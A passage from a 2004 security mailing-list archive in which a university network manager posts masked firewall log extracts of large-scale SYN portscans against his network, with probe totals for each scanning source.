6 00:56:44 218.65.245.92:2496 -> xxx.yyy.215.229:5554 SYN ******S* Jul 6 00:56:44 218.65.245.92:2503 -> xxx.yyy.215.222:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2980 -> xxx.yyy.215.222:1023 SYN ******S* Jul 6 00:56:44 218.65.245.92:2498 -> xxx.yyy.215.227:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2975 -> xxx.yyy.215.227:1023 SYN ******S* Jul 6 00:56:44 218.65.245.92:2502 -> xxx.yyy.215.223:5554 SYN ******S* [...] Jul 6 00:57:59 218.65.245.92:2547 -> xxx.yyy.236.18:9898 SYN ******S* Jul 6 00:57:59 218.65.245.92:2625 -> xxx.yyy.236.70:9898 SYN ******S* Jul 6 00:57:59 218.65.245.92:2657 -> xxx.yyy.236.65:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2711 -> xxx.yyy.236.73:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2709 -> xxx.yyy.236.75:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2708 -> xxx.yyy.236.76:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2644 -> xxx.yyy.236.20:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2653 -> xxx.yyy.236.25:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2609 -> xxx.yyy.236.62:9898 SYN ******S* 5801 Jul 6 04:59:15 82.254.35.217:1030 -> xxx.yyy.1.0:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1031 -> xxx.yyy.1.1:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1032 -> xxx.yyy.1.2:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1033 -> xxx.yyy.1.3:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1034 -> xxx.yyy.1.4:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1035 -> xxx.yyy.1.5:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1036 -> xxx.yyy.1.6:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1037 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 6 05:38:23 82.254.35.217:4113 -> xxx.yyy.17.253:1433 SYN ******S* Jul 6 05:38:23 82.254.35.217:4114 -> xxx.yyy.17.254:1433 SYN ******S* Jul 6 05:38:23 82.254.35.217:4115 -> xxx.yyy.17.255:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4109 -> xxx.yyy.17.251:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4110 -> xxx.yyy.17.252:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4113 -> xxx.yyy.17.253:1433 SYN ******S* Jul 6 05:38:30 82.254.35.217:4114 -> xxx.yyy.17.254:1433 SYN ******S* Jul 6 05:38:30 82.254.35.217:4115 -> xxx.yyy.17.255:1433 SYN ******S* 5698 Jul 6 00:46:00 219.140.88.41:4322 -> xxx.yyy.215.215:5554 SYN ******S* Jul 6 00:46:01 219.140.88.41:4493 -> xxx.yyy.215.215:1023 SYN ******S* Jul 6 00:46:00 219.140.88.41:4325 -> xxx.yyy.215.213:5554 SYN ******S* Jul 6 00:46:01 219.140.88.41:4321 -> xxx.yyy.215.214:5554 SYN ******S* Jul 6 00:46:02 219.140.88.41:4492 -> xxx.yyy.215.214:1023 SYN ******S* Jul 6 00:46:04 219.140.88.41:1074 -> xxx.yyy.215.214:9898 SYN ******S* Jul 6 00:46:01 219.140.88.41:4316 -> xxx.yyy.215.210:5554 SYN ******S* Jul 6 00:46:02 219.140.88.41:4484 -> xxx.yyy.215.210:1023 SYN ******S* [...] Jul 6 00:47:53 219.140.88.41:2945 -> xxx.yyy.236.17:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2947 -> xxx.yyy.236.23:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2961 -> xxx.yyy.236.41:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2957 -> xxx.yyy.236.37:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2984 -> xxx.yyy.236.43:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:3006 -> xxx.yyy.236.53:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2934 -> xxx.yyy.236.30:9898 SYN ******S* Jul 6 00:47:54 219.140.88.41:3244 -> xxx.yyy.236.69:9898 SYN ******S* Jul 6 00:47:55 219.140.88.41:3246 -> xxx.yyy.236.71:9898 SYN ******S* 5683 Jul 6 00:55:59 61.49.138.129:4167 -> xxx.yyy.64.0:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4908 -> xxx.yyy.64.0:1023 SYN ******S* Jul 6 00:56:02 61.49.138.129:1841 -> xxx.yyy.64.0:9898 SYN ******S* Jul 6 00:55:59 61.49.138.129:4176 -> xxx.yyy.64.1:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4914 -> xxx.yyy.64.1:1023 SYN ******S* Jul 6 00:56:02 61.49.138.129:1844 -> xxx.yyy.64.1:9898 SYN ******S* Jul 6 00:55:59 61.49.138.129:4183 -> xxx.yyy.64.2:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4939 -> xxx.yyy.64.2:1023 SYN ******S* [...] Jul 6 00:56:18 61.49.138.129:2214 -> xxx.yyy.71.30:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2215 -> xxx.yyy.71.31:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2213 -> xxx.yyy.71.29:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2224 -> xxx.yyy.71.32:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2228 -> xxx.yyy.71.33:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2235 -> xxx.yyy.71.34:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2247 -> xxx.yyy.71.35:9898 SYN ******S* Jul 6 00:56:18 61.49.138.129:2251 -> xxx.yyy.71.36:9898 SYN ******S* 5579 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From Ken.Connelly at uni.edu Thu Jul 8 12:31:06 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Thu, 08 Jul 2004 07:31:06 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC7LH85VWK8YBZ2Y@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 7 04:32:05 80.225.108.92:1151 -> xxx.yyy.10.0:1433 SYN ******S* Jul 7 04:32:05 80.225.108.92:1163 -> xxx.yyy.10.1:1433 SYN ******S* Jul 7 04:32:05 80.225.108.92:1167 -> xxx.yyy.10.2:1433 SYN ******S* Jul 7 04:32:05 80.225.108.92:1172 -> xxx.yyy.10.3:1433 SYN ******S* Jul 7 04:32:05 80.225.108.92:1173 -> xxx.yyy.10.4:1433 SYN ******S* Jul 7 04:32:05 80.225.108.92:1174 -> xxx.yyy.10.5:1433 SYN ******S* Jul 7 04:32:06 80.225.108.92:1184 -> xxx.yyy.10.7:1433 SYN ******S* Jul 7 04:32:06 80.225.108.92:1185 -> xxx.yyy.10.8:1433 SYN ******S* [...] Jul 7 08:12:45 80.225.108.92:3078 -> xxx.yyy.255.246:1433 SYN ******S* Jul 7 08:12:45 80.225.108.92:3092 -> xxx.yyy.255.248:1433 SYN ******S* Jul 7 08:12:45 80.225.108.92:3091 -> xxx.yyy.255.247:1433 SYN ******S* Jul 7 08:12:45 80.225.108.92:3094 -> xxx.yyy.255.249:1433 SYN ******S* Jul 7 08:12:45 80.225.108.92:3095 -> xxx.yyy.255.250:1433 SYN ******S* Jul 7 08:12:45 80.225.108.92:3100 -> xxx.yyy.255.251:1433 SYN ******S* Jul 7 08:12:46 80.225.108.92:3112 -> xxx.yyy.255.254:1433 SYN ******S* Jul 7 08:12:46 80.225.108.92:3110 -> xxx.yyy.255.253:1433 SYN ******S* Jul 7 08:12:46 80.225.108.92:3109 -> xxx.yyy.255.252:1433 SYN ******S* 121074 Jul 7 03:33:12 193.255.139.103:3074 -> xxx.yyy.1.1:1433 SYN ******S* Jul 7 03:33:12 193.255.139.103:3076 -> xxx.yyy.1.2:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3739 -> xxx.yyy.1.3:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3740 -> xxx.yyy.1.4:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3741 -> xxx.yyy.1.5:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3742 -> xxx.yyy.1.6:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3744 -> xxx.yyy.1.8:1433 SYN ******S* Jul 7 03:33:13 193.255.139.103:3745 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 7 03:46:10 193.255.139.103:2321 -> xxx.yyy.255.244:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2322 -> xxx.yyy.255.245:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2323 -> xxx.yyy.255.246:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2328 -> xxx.yyy.255.249:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2329 -> xxx.yyy.255.250:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2330 -> xxx.yyy.255.251:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2331 -> xxx.yyy.255.252:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2332 -> xxx.yyy.255.253:1433 SYN ******S* Jul 7 03:46:10 193.255.139.103:2333 -> xxx.yyy.255.254:1433 SYN ******S* 85885 Jul 7 09:49:22 82.32.62.64:3950 -> xxx.yyy.1.0:1433 SYN ******S* Jul 7 09:49:19 82.32.62.64:3984 -> xxx.yyy.1.8:1433 SYN ******S* Jul 7 09:49:19 82.32.62.64:3980 -> xxx.yyy.1.7:1433 SYN ******S* Jul 7 09:49:19 82.32.62.64:3986 -> xxx.yyy.1.9:1433 SYN ******S* Jul 7 09:49:22 82.32.62.64:3991 -> xxx.yyy.1.10:1433 SYN ******S* Jul 7 09:49:22 82.32.62.64:3998 -> xxx.yyy.1.12:1433 SYN ******S* Jul 7 09:49:22 82.32.62.64:4001 -> xxx.yyy.1.13:1433 SYN ******S* Jul 7 09:49:22 82.32.62.64:3993 -> xxx.yyy.1.11:1433 SYN ******S* [...] Jul 7 13:43:51 82.32.62.64:4138 -> xxx.yyy.255.240:1433 SYN ******S* Jul 7 13:43:52 82.32.62.64:4143 -> xxx.yyy.255.243:1433 SYN ******S* Jul 7 13:43:52 82.32.62.64:4142 -> xxx.yyy.255.242:1433 SYN ******S* Jul 7 13:43:52 82.32.62.64:4141 -> xxx.yyy.255.241:1433 SYN ******S* Jul 7 13:43:52 82.32.62.64:4144 -> xxx.yyy.255.244:1433 SYN ******S* Jul 7 13:43:53 82.32.62.64:4167 -> xxx.yyy.255.251:1433 SYN ******S* Jul 7 13:43:53 82.32.62.64:4166 -> xxx.yyy.255.250:1433 SYN ******S* Jul 7 13:43:53 82.32.62.64:4165 -> xxx.yyy.255.249:1433 SYN ******S* Jul 7 13:43:54 82.32.62.64:4174 -> xxx.yyy.255.254:1433 SYN ******S* 84673 Jul 7 12:49:08 200.79.231.6:35936 -> xxx.yyy.1.7:443 SYN ******S* Jul 7 12:49:05 200.79.231.6:35929 -> xxx.yyy.1.0:443 SYN ******S* Jul 7 12:49:05 200.79.231.6:35932 -> xxx.yyy.1.3:443 SYN ******S* Jul 7 12:49:05 200.79.231.6:35930 -> xxx.yyy.1.1:443 SYN ******S* Jul 7 12:49:05 200.79.231.6:35944 -> xxx.yyy.1.15:443 SYN ******S* Jul 7 12:49:08 200.79.231.6:35941 -> xxx.yyy.1.12:443 SYN ******S* Jul 7 12:49:08 200.79.231.6:35937 -> xxx.yyy.1.8:443 SYN ******S* Jul 7 12:49:08 200.79.231.6:35935 -> xxx.yyy.1.6:443 SYN ******S* [...] Jul 7 20:27:49 200.79.231.6:51525 -> xxx.yyy.255.158:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51520 -> xxx.yyy.255.153:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51541 -> xxx.yyy.255.174:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51546 -> xxx.yyy.255.179:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51472 -> xxx.yyy.255.105:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51476 -> xxx.yyy.255.109:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51477 -> xxx.yyy.255.110:443 SYN ******S* Jul 7 20:27:49 200.79.231.6:51473 -> xxx.yyy.255.106:443 SYN ******S* 74412 Jul 7 13:05:56 65.105.238.34:4896 -> xxx.yyy.1.1:8000 SYN ******S* Jul 7 13:05:56 65.105.238.34:4897 -> xxx.yyy.1.2:8000 SYN ******S* Jul 7 13:05:56 65.105.238.34:4898 -> xxx.yyy.1.3:8000 SYN ******S* Jul 7 13:05:57 65.105.238.34:4899 -> xxx.yyy.1.4:8000 SYN ******S* Jul 7 13:05:57 65.105.238.34:4900 -> xxx.yyy.1.5:8000 SYN ******S* Jul 7 13:05:57 65.105.238.34:4901 -> xxx.yyy.1.6:8000 SYN ******S* Jul 7 13:05:57 65.105.238.34:4902 -> xxx.yyy.1.7:8000 SYN ******S* Jul 7 13:05:57 65.105.238.34:4903 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 7 13:16:52 65.105.238.34:3065 -> xxx.yyy.255.241:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3070 -> xxx.yyy.255.246:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3066 -> xxx.yyy.255.242:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3075 -> xxx.yyy.255.251:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3076 -> xxx.yyy.255.252:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3077 -> xxx.yyy.255.253:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3073 -> xxx.yyy.255.249:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3074 -> xxx.yyy.255.250:8000 SYN ******S* Jul 7 13:16:52 65.105.238.34:3078 -> xxx.yyy.255.254:8000 SYN ******S* 72031 Jul 7 22:14:25 131.109.145.9:1752 -> xxx.yyy.1.1:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1753 -> xxx.yyy.1.4:5554 SYN ******S* Jul 7 22:14:25 131.109.145.9:1760 -> xxx.yyy.1.2:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1754 -> xxx.yyy.1.5:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1755 -> xxx.yyy.1.6:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1756 -> xxx.yyy.1.7:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1757 -> xxx.yyy.1.8:5554 SYN ******S* Jul 7 22:14:27 131.109.145.9:1759 -> xxx.yyy.1.9:5554 SYN ******S* [...] Jul 7 22:17:09 131.109.145.9:2427 -> xxx.yyy.254.113:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2424 -> xxx.yyy.254.110:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2440 -> xxx.yyy.254.126:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2421 -> xxx.yyy.254.107:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2418 -> xxx.yyy.254.104:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2443 -> xxx.yyy.254.130:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2415 -> xxx.yyy.254.101:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2431 -> xxx.yyy.254.117:5554 SYN ******S* Jul 7 22:17:09 131.109.145.9:2425 -> xxx.yyy.254.111:5554 SYN ******S* 65367 Jul 7 19:48:56 217.160.111.233:52785 -> xxx.yyy.1.0:80 SYN ******S* Jul 7 19:48:56 217.160.111.233:52786 -> xxx.yyy.1.1:80 SYN ******S* Jul 7 19:48:56 217.160.111.233:52787 -> xxx.yyy.1.2:80 SYN ******S* Jul 7 19:48:56 217.160.111.233:52788 -> xxx.yyy.1.3:80 SYN ******S* Jul 7 19:48:59 217.160.111.233:52791 -> xxx.yyy.1.6:80 SYN ******S* Jul 7 19:48:59 217.160.111.233:52790 -> xxx.yyy.1.5:80 SYN ******S* Jul 7 19:48:59 217.160.111.233:52789 -> xxx.yyy.1.4:80 SYN ******S* Jul 7 19:48:59 217.160.111.233:52793 -> xxx.yyy.1.8:80 SYN ******S* [...] Jul 7 20:14:13 217.160.111.233:43564 -> xxx.yyy.255.240:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43566 -> xxx.yyy.255.242:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43565 -> xxx.yyy.255.241:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43567 -> xxx.yyy.255.243:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43568 -> xxx.yyy.255.244:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43569 -> xxx.yyy.255.245:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43570 -> xxx.yyy.255.246:80 SYN ******S* Jul 7 20:14:13 217.160.111.233:43571 -> xxx.yyy.255.247:80 SYN ******S* 63305 Jul 7 04:56:12 61.37.115.167:1888 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 04:56:10 61.37.115.167:1893 -> xxx.yyy.1.8:4899 SYN ******S* Jul 7 04:56:12 61.37.115.167:1886 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 04:56:12 61.37.115.167:1887 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 04:56:10 61.37.115.167:1895 -> xxx.yyy.1.10:4899 SYN ******S* Jul 7 04:56:12 61.37.115.167:1899 -> xxx.yyy.1.14:4899 SYN ******S* Jul 7 04:56:10 61.37.115.167:1898 -> xxx.yyy.1.13:4899 SYN ******S* Jul 7 04:56:10 61.37.115.167:1897 -> xxx.yyy.1.12:4899 SYN ******S* [...] Jul 7 05:00:09 61.37.115.167:2773 -> xxx.yyy.255.246:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2779 -> xxx.yyy.255.252:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2769 -> xxx.yyy.255.242:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2781 -> xxx.yyy.255.254:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2765 -> xxx.yyy.255.238:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2766 -> xxx.yyy.255.239:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2768 -> xxx.yyy.255.241:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2777 -> xxx.yyy.255.250:4899 SYN ******S* Jul 7 05:00:09 61.37.115.167:2780 -> xxx.yyy.255.253:4899 SYN ******S* 44199 Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 7 15:05:45 67.176.103.53:22002 -> xxx.yyy.1.1:3128 SYN ******S* Jul 7 15:05:46 67.176.103.53:22002 -> xxx.yyy.1.2:3127 SYN ******S* Jul 7 15:05:46 67.176.103.53:22002 -> xxx.yyy.1.2:1080 SYN ******S* [...] Jul 7 17:55:23 67.176.103.53:22002 -> xxx.yyy.95.254:3127 SYN ******S* Jul 7 17:55:23 67.176.103.53:22002 -> xxx.yyy.95.254:1080 SYN ******S* Jul 7 17:55:23 67.176.103.53:22002 -> xxx.yyy.95.254:10080 SYN ******S* Jul 7 17:55:23 67.176.103.53:22002 -> xxx.yyy.95.254:3128 SYN ******S* Jul 7 17:55:23 67.176.103.53:22002 -> xxx.yyy.95.255:3127 SYN ******S* Jul 7 17:55:24 67.176.103.53:22002 -> xxx.yyy.95.255:1080 SYN ******S* Jul 7 17:55:24 67.176.103.53:22002 -> xxx.yyy.95.255:10080 SYN ******S* Jul 7 17:55:24 67.176.103.53:22002 -> xxx.yyy.95.255:3128 SYN ******S* 44181 Jul 7 23:42:27 61.82.81.146:3192 -> xxx.yyy.1.4:4899 SYN ******S* Jul 7 23:42:27 61.82.81.146:3193 -> xxx.yyy.1.5:4899 SYN ******S* Jul 7 23:42:29 61.82.81.146:3189 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 23:42:27 61.82.81.146:3195 -> xxx.yyy.1.7:4899 SYN ******S* Jul 7 23:42:27 61.82.81.146:3196 -> xxx.yyy.1.8:4899 SYN ******S* Jul 7 23:42:29 61.82.81.146:3190 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 23:42:29 61.82.81.146:3191 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 23:42:29 61.82.81.146:3199 -> xxx.yyy.1.11:4899 SYN ******S* [...] Jul 7 23:46:03 61.82.81.146:3338 -> xxx.yyy.253.146:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3320 -> xxx.yyy.253.128:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3322 -> xxx.yyy.253.130:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3324 -> xxx.yyy.253.132:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3333 -> xxx.yyy.253.141:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3334 -> xxx.yyy.253.142:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3335 -> xxx.yyy.253.143:4899 SYN ******S* Jul 7 23:46:03 61.82.81.146:3337 -> xxx.yyy.253.145:4899 SYN ******S* 44022 Jul 7 23:53:29 61.83.206.110:3829 -> xxx.yyy.1.4:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3830 -> xxx.yyy.1.5:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3837 -> xxx.yyy.1.10:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3840 -> xxx.yyy.1.13:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3834 -> xxx.yyy.1.7:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3842 -> xxx.yyy.1.15:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3835 -> xxx.yyy.1.8:4899 SYN ******S* Jul 7 23:53:29 61.83.206.110:3836 -> xxx.yyy.1.9:4899 SYN ******S* [...] Jul 7 23:59:37 61.83.206.110:3535 -> xxx.yyy.254.246:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3536 -> xxx.yyy.254.247:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3531 -> xxx.yyy.254.242:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3537 -> xxx.yyy.254.248:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3539 -> xxx.yyy.254.250:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3540 -> xxx.yyy.254.251:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3541 -> xxx.yyy.254.252:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3538 -> xxx.yyy.254.249:4899 SYN ******S* Jul 7 23:59:37 61.83.206.110:3542 -> xxx.yyy.254.253:4899 SYN ******S* 43084 Jul 7 23:53:06 203.232.41.73:1392 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 23:53:05 203.232.41.73:1390 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 23:53:06 203.232.41.73:1391 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 23:53:04 203.232.41.73:1393 -> xxx.yyy.1.4:4899 SYN ******S* Jul 7 23:53:04 203.232.41.73:1395 -> xxx.yyy.1.6:4899 SYN ******S* Jul 7 23:53:04 203.232.41.73:1396 -> xxx.yyy.1.7:4899 SYN ******S* Jul 7 23:53:04 203.232.41.73:1398 -> xxx.yyy.1.9:4899 SYN ******S* Jul 7 23:53:04 203.232.41.73:1399 -> xxx.yyy.1.10:4899 SYN ******S* [...] Jul 7 23:57:39 203.232.41.73:2969 -> xxx.yyy.254.248:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2961 -> xxx.yyy.254.240:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2963 -> xxx.yyy.254.242:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2965 -> xxx.yyy.254.244:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2970 -> xxx.yyy.254.249:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2971 -> xxx.yyy.254.250:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2972 -> xxx.yyy.254.251:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2973 -> xxx.yyy.254.252:4899 SYN ******S* Jul 7 23:57:39 203.232.41.73:2974 -> xxx.yyy.254.253:4899 SYN ******S* 41355 Jul 7 04:15:23 67.164.22.248:4737 -> xxx.yyy.1.3:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4740 -> xxx.yyy.1.5:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4743 -> xxx.yyy.1.7:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4738 -> xxx.yyy.1.4:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4742 -> xxx.yyy.1.6:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4756 -> xxx.yyy.1.14:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4815 -> xxx.yyy.1.49:1433 SYN ******S* Jul 7 04:15:23 67.164.22.248:4816 -> xxx.yyy.1.50:1433 SYN ******S* [...] Jul 7 04:20:37 67.164.22.248:4113 -> xxx.yyy.255.205:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4111 -> xxx.yyy.255.204:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4106 -> xxx.yyy.255.201:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4127 -> xxx.yyy.255.212:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4136 -> xxx.yyy.255.215:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4134 -> xxx.yyy.255.214:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4141 -> xxx.yyy.255.216:1433 SYN ******S* Jul 7 04:20:37 67.164.22.248:4143 -> xxx.yyy.255.217:1433 SYN ******S* Jul 7 04:20:38 67.164.22.248:4144 -> xxx.yyy.255.218:1433 SYN ******S* 37604 Jul 7 08:06:48 150.254.18.4:1176 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 08:06:48 150.254.18.4:1177 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 08:06:48 150.254.18.4:1178 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 08:06:47 150.254.18.4:1179 -> xxx.yyy.1.4:4899 SYN ******S* Jul 7 08:06:47 150.254.18.4:1180 -> xxx.yyy.1.5:4899 SYN ******S* Jul 7 08:06:47 150.254.18.4:1181 -> xxx.yyy.1.6:4899 SYN ******S* Jul 7 08:06:47 150.254.18.4:1182 -> xxx.yyy.1.7:4899 SYN ******S* Jul 7 08:06:47 150.254.18.4:1183 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 7 08:10:13 150.254.18.4:4845 -> xxx.yyy.158.210:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4850 -> xxx.yyy.158.211:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4852 -> xxx.yyy.158.212:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4853 -> xxx.yyy.158.213:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4854 -> xxx.yyy.158.214:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4856 -> xxx.yyy.158.215:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4858 -> xxx.yyy.158.216:4899 SYN ******S* Jul 7 08:10:13 150.254.18.4:4859 -> xxx.yyy.158.217:4899 SYN ******S* 19557 Jul 7 10:19:32 83.114.29.176:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 7 10:19:32 83.114.29.176:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 7 10:19:32 83.114.29.176:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 7 10:19:32 83.114.29.176:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 7 10:19:33 83.114.29.176:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 7 10:19:33 83.114.29.176:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 7 10:19:33 83.114.29.176:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 7 10:19:33 83.114.29.176:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jul 7 12:39:16 83.114.29.176:22002 -> xxx.yyy.71.93:3127 SYN ******S* Jul 7 12:39:16 83.114.29.176:22002 -> xxx.yyy.71.93:1080 SYN ******S* Jul 7 12:39:16 83.114.29.176:22002 -> xxx.yyy.71.93:10080 SYN ******S* Jul 7 12:39:17 83.114.29.176:22002 -> xxx.yyy.71.93:3128 SYN ******S* Jul 7 12:39:17 83.114.29.176:22002 -> xxx.yyy.71.94:3127 SYN ******S* Jul 7 12:39:17 